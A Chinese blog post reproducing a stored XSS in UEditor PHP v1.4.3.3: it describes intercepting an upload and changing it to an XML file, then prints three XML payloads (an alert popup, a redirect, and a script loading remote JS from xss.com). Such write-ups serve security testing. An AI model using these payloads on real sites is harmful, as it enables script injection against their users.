大神论坛 UEditor 富文本web编辑器最新漏洞版XML文件上传导致存储型XSS

最新推荐文章于 2024-06-06 09:18:49 发布
最新推荐文章于 2024-06-06 09:18:49 发布
阅读量1.6k 收藏 2
点赞数
分类专栏: 逆向分析 逆向工程 软件脱壳 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaotuge_always/article/details/118053182
版权

一、Ueditor最新版XML文件上传导致存储型XSS

测试版本:php版 v1.4.3.3

下载地址:https://github.com/fex-team/ueditor 复现步骤:

1. 上传一个图片文件

在这里插入图片描述

2. 然后buprsuit抓包拦截

在这里插入图片描述

3.将uploadimage类型改为uploadfile,并修改文件后缀名为xml,最后复制上xml代码即可

在这里插入图片描述

4. 即可弹出xss

在这里插入图片描述

请注意http://controller.xxx的访问路径

http://192.168.10.1/ueditor1433/php/controller.php?action=listfile

在这里插入图片描述

常见的xml弹窗POC:

弹窗xss:

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml"> alert(1);
</something:script>
</body>
</html>

URL跳转:

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml"> window.location.href="https://www.t00ls.net/";
</something:script>
</body>
</html>

远程加载Js:

<html>
<head></head>
<body>
<something:script src="http://xss.com/xss.js" xmlns:something="http://www.w3.org/1999/xhtml">
</something:script>
</body>
</html>

最低0.47元/天 解锁文章
大神论坛
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
UEditor v1.4.3.3 .net本任意文件上传 漏洞复现
Boom!脑洞大爆炸的博客
07-07 6373
UEditor v1.4.3.3 .net本任意文件上传 漏洞复现
ueidtor安全漏洞_UEditor SSRF漏洞(JSP本)分析与复现
weixin_33318722的博客
12-31 4773
作者: 浮萍@猎户安全实验室公众号:[猎户安全实验室](https://mp.weixin.qq.com/s/OPbyYQNWiN2dy_BHhqd9eg "猎户安全实验室")前些时间测试的时候遇到了一个系统采用了UEditor编辑器本为1.4.3。已知该编辑器v1.4.3本存在SSRF漏洞,虽然是Bool的SSRF,除了可以进行内网探测外,也可以根据web应用指纹信息,之后进行进一步的测...
技术分享-ueditor漏洞利用&源码分析超详细分析
最新发布
zz12345600354的博客
06-06 763
ueditor漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor的上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
实战纪实 | 编辑器漏洞Ueditor-任意文件上传漏洞 (老洞新谈)
zkaqlaoniao的博客
04-12 6248
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net本。其他的php,jsp,asp本不受此UEditor漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
技术分享|ueditor漏洞利用&源码分析超详细分析
baidu_38876334的博客
04-02 5019
ueditor漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor的上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
Ueditor、FCKeditor、Kindeditor编辑器漏洞
网安君的博客
01-27 6280
UEditor是由百度web前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点。Ueditor、FCKeditor、Kindeditor编辑器漏洞
UEditor 富文本 web 编辑器
11-23
UEditor是一款由百度FEX前端研发团队开发的高性能、易使用的富文本Web编辑器。它以其轻量级、高度可定制以及对用户体验的重视而受到广大开发者和网站管理员的青睐。UEditor遵循MIT协议,这意味着它对用户是完全开放...
YII中Ueditor富文本编辑器文件和图片上传的配置图文教程
12-18
在本文中,我们将深入探讨如何在YII框架中配置Ueditor富文本编辑器,以便实现文件和图片的上传功能。Ueditor是一款强大的在线文本编辑工具,它可以方便地嵌入到各种Web应用中,提供丰富的编辑功能。以下是详细的配置...
UEditor富文本编辑器的静态资源部分
10-25
**UEditor富文本编辑器**是一款广泛应用于Web开发中的强大编辑工具,由百度公司开发,提供了丰富的API和自定义功能,使得开发者可以轻松地在网页上实现文本编辑、格式化、图片上传等功能。本资源包主要包含UEditor的...
百度富文本编辑器UEditor 1.4.3
07-20
百度富文本编辑器UEditor是一款由百度公司开发的开源富文本编辑器,它在1.4.3本中提供了丰富的功能和优秀的用户体验,适用于网页内容编辑、论坛发帖、博客写作等多种场景。UEditor以其易用性、稳定性和可定制性...
vue集成百度UEditor富文本编辑器使用教程
10-17
主要为大家详细介绍了vue集成百度UEditor富文本编辑器的使用教程,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
ueditor完整实例jsp(可上传图片、视频、文件)
08-12
MyEclipse工程,整合UE1.4.3jsp,可以上传图片、文件、视频 无错误
Ueditor(jsp_utf8编码)百度文章编辑器_插件
07-23
Ueditor(jsp_utf8编码)百度文章编辑器_插件 貌似是2013年5、6月的本,现在最新的包又不一样了
UeditorXML文件上传导致存储XSS(可以再试试xxe)和ssrf漏洞
weixin_50464560的博客
05-16 7474
UEditor 富文本web编辑器最新漏洞XML文件上传导致存储XSS - 『原创发布区』 - 大神论坛 |脱壳破解|易语言|病毒分析|www.dslt.tech 一、Ueditor最新XML文件上传导致存储XSS 测试本:phpv1.4.3.3 下载地址:https://github.com/fex-team/ueditor复现步骤: 1.上传一个图片文件 2.然后buprsuit抓包拦截 3.将uploadimage类改为uploadfile,并修改文件后...
UEditor上传导致 XSS漏洞复现
afei001
07-16 2537
UEditor是由百度「FEX前端研发团队」开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。UEditorv1.4.3.3中存在跨站脚本(XSS漏洞。...
UEditor漏洞
2ed
07-29 1万+
UEditor是由百度开发的开源富文本编辑器,开源基于BSD协议,小巧灵活,使用简单,有很多web程序在使用UEditor编辑器。该任意文件上传漏洞存在于1.4.3.3和1.5.0本中,并且只有.NET本受该漏洞影响。黑客可以利用该漏洞上传木马文件,执行命令控制服务器。
修复富文本编辑器引起的XSS安全问题
weixin_45394033的博客
10-24 3034
在平时使用的富文本编辑器中也会存在恶意输入JS脚本使用js-xss 对文本进行过滤,删除掉可能存在的脚本富文本形式输入脚本的形式是 存储xss,提交的数据存在脚本,并且保存成功。其他人访问当前页面就会触发开启httponly(禁止JS获取Cookie)输入过滤,输出转义。
Ueditor编辑器任意文件上传漏洞
热门推荐
m0_51468027的博客
07-30 1万+
一文学习Ueditor编辑器任意文件上传漏洞(部署环境到漏洞复现)
富文本编辑器 xss 攻击的解决
ISaiSai的专栏
03-10 1万+
普通xss 攻击,通过html 转意就可以很好地解决但是富文本编辑器,本身就是允许输入html 标签的,不能转义需要引入第三方防止xss的包来处理,对文章内html 进行处 参考文章:http://jsxss.com/zh/starter/quickstart.html
百度ueditor富文本编辑器1.4.3本兼容windows xp系统吗
08-30
百度ueditor富文本编辑器1.4.3本是一个流行的富文本编辑器,用于在网页上创建和编辑内容。关于其是否兼容Windows XP系统的问题,需要注意以下几点。 首先,需要了解Windows XP系统的特点。Windows XP是微软发布的一个操作系统本,于2001年发布,并于2014年停止了官方支持。由于年代久远,它具有一些限制和兼容性问题。 其次,百度ueditor是基于HTML、JavaScript和CSS编写的,因此可以在大多数现代浏览器上运行。然而,由于Windows XP系统的限制,它可能不支持新的浏览器本。在XP上的IE浏览器只能升级到IE8,而Firefox和Chrome等主流浏览器也停止了对XP的支持。 因此,百度ueditor富文本编辑器1.4.3本可能在XP系统上无法正常运行。由于IE8和一些老旧浏览器的限制,该本的功能可能无法充分展示,并可能存在兼容性问题。建议使用更新的操作系统和浏览器来保证富文本编辑器的正常运行。 总结起来,百度ueditor富文本编辑器1.4.3本可能不兼容Windows XP系统,使用时可能会有一些限制和兼容性问题。建议使用更新的操作系统和浏览器来获得更好的使用体验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大神论坛

喜欢作者

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值